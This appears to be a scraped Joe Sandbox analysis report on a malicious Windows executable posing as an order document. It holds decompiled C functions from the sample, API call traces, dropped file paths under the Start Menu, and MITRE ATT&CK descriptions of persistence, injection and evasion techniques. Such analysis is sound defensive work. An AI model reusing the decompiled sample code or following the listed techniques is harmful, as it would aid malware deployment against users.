					} while (_t8 != 0);
				}
				 *0x41fcf4 =  *0x41fcf4 & 0x00000000;
				return _t3;
			}

0x00403855
0x0040385d
0x00403864
0x00403867
0x00403867
0x00403869
0x0040386e
0x00403875
0x0040387b
0x0040387f
0x00403880
0x00403888

APIs

FreeLibrary.KERNEL32(?,77313410,00000000,77312EE0,0040382B,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040386E
GlobalFree.KERNEL32(00522CE0), ref: 00403875

Strings

,R, xrefs: 00403855, 00403880

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: ,R
API String ID: 1100898210-1483067370
Opcode ID: bf20d2945bb5ef82aea882dca47bf7a800ed57bbe34a1365a93ea0a8c88c69c9
Instruction ID: 5a7e105abd1ff501ddbafdab51ff1ddcb88a66ee3eeb0d8e06bf853bef0fe42f
Opcode Fuzzy Hash: bf20d2945bb5ef82aea882dca47bf7a800ed57bbe34a1365a93ea0a8c88c69c9
Instruction Fuzzy Hash: 9AE08C3380112097C6212F25EA0475AB7A86F44B22F1180BAFC807B2608B741C428AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A78(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405a79
0x00405a83
0x00405a85
0x00405a8c
0x00405a94
0x00000000
0x00000000
0x00000000
0x00405a94
0x00405a96
0x00405a9b

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,80000000,00000003), ref: 00405A7E
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe,80000000,00000003), ref: 00405A8C

Strings

C:\Users\user\Desktop, xrefs: 00405A78

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction ID: 40098e637bf6d505f922d12736ff559178fc12fa7d0ee67292c12de19d06dc46
Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction Fuzzy Hash: 6ED0A7729089702EF30393108C00B9F6A88CF16341F090062E480A7191C67C0C424BAD

Uniqueness

Uniqueness Score: -1.00%

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556, _t52);
				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
				_t17 = E1000123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E10001266(E100012AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E100012D1( *_t55 - 0x30, E1000123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001508(_t31 + 4,  *0x10004064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001508( *0x10004064, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x100010e7
0x100010ef
0x10001103
0x1000110b
0x10001116
0x10001119
0x10001121
0x10001124
0x10001126
0x100011c4
0x100011d0
0x1000112c
0x1000112d
0x1000112d
0x10001130
0x10001131
0x10001134
0x10001203
0x10001206
0x1000119e
0x100011a4
0x100011ac
0x100011b1
0x100011b4
0x00000000
0x100011b4
0x10001209
0x1000120a
0x10001186
0x1000118c
0x10001194
0x00000000
0x10001194
0x10001152
0x10001153
0x1000115b
0x10001168
0x10001170
0x10001179
0x1000117e
0x1000117e
0x00000000
0x10001153
0x1000113a
0x100011d1
0x100011d1
0x100011d8
0x100011e5
0x100011ea
0x100011ef
0x100011f5
0x100011fb
0x100011fb
0x00000000
0x100011d8
0x10001140
0x10001143
0x00000000
0x00000000
0x10001149
0x1000114c
0x1000119b
0x00000000
0x1000119b
0x1000114f
0x10001150
0x10001183
0x00000000
0x10001183
0x00000000
0x100011ba
0x100011ba
0x00000000
0x100011c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000002.00000002.23343286065.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.23343244782.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343346960.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.23343388834.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00405B97 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B97(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405ba7
0x00405ba9
0x00405bac
0x00405bd8
0x00405bb1
0x00405bba
0x00405bbf
0x00405bca
0x00405bcd
0x00405be9
0x00405bcf
0x00405bd6
0x00000000
0x00405bd6
0x00405be2
0x00405be6
0x00405be6
0x00405be0
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BBF
CharNextA.USER32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD0
lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
Instruction ID: c0798baac460c4c161baa60e5c3960505173fe7825234d44b9ee5cd82a8c1779
Opcode Fuzzy Hash: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
Instruction Fuzzy Hash: 29F06235105918AFCB02DFA9DD40D9EBBB8EF46350B2540B9F840FB211D674FE01ABA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Order_002376662-579588_Date 24082022.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Forhaanet.Nab

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\GPUPowerSavingConfigEditor.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Holograph\Towy\Dgnrytmers\face-cool.png

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Kalligraferendes\Quantisers\Aqua_20.bmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Noneffervescently.Cre

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne\Tilegnelserne\Suppegrydernes79\iso_3166-1.json

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
Order_002376662-579588_Date 24082022.exe

Function 0040330D Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 368
stringcomfileCOMMON

Function 004052FE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405861 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Function 03514446 Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 671
COMMON

Function 00406725 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040639C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00403C86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 004038E9 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402D98 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 004060BB Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 004051C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00405686 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 004063C3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405C61 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 00406576 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Function 00403146 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Function 004023D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 00401FFD Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON